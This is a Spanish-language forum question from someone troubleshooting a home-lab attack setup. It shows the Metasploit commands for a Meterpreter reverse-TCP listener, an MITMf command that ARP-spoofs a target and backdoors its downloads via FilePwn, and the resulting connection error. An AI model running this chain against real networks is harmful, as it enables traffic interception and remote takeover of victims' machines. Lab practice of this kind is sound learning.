Estoy intentando inyectar una carga útil maliciosa en la solicitud http. Tengo un servidor de lámparas personal, una máquina virtual Kali y la máquina virtual más XP de Windows. Y todo está en mi red y es legal. He estado siguiendo este tutorial.
Corrí metasploit con lo siguiente
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.4
set LPORT 8843
exploit -j
Al ver el video, Metasploit dice
[*] Starting the payload handler...
En mi extremo, comienza diciendo eso, luego me lleva de vuelta a la consola. Raro, pero supongo lo que sea.
Ahora estoy intentando ejecutar mitmf en una ventana de terminal diferente
sudo ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.244 --filepwn
Este es el mensaje de error que recibo de mitmf.
[*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
|_ Spoof v0.6
| |_ ARP spoofing enabled
|_ FilePwn v0.3
| |_ BDFProxy v0.3.2 online
2018-07-17 02:23:27 [ARPpoisoner] Restoring connection 192.168.1.244 <-> 192.168.1.1 with 2 packets per host
[Msfrpc] Error connecting to Metasploit: HTTPConnectionPool(host='127.0.0.1', port=55552): Max retries exceeded with url: /api/ (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7fd9b7772290>: Failed to establish a new connection: [Errno 111] Connection refused',))
Hice algo de google y encontré este hilo.
Seguí sus instrucciones de 2 instrucciones de comando y comencé de nuevo todo el proceso sin suerte. Incluso intenté cambiar el LPORT a 55552 pero eso también falló. No soy un experto en Metasploit, por lo que ni siquiera sabría qué buscar. ¿Cómo puedo solucionar este problema?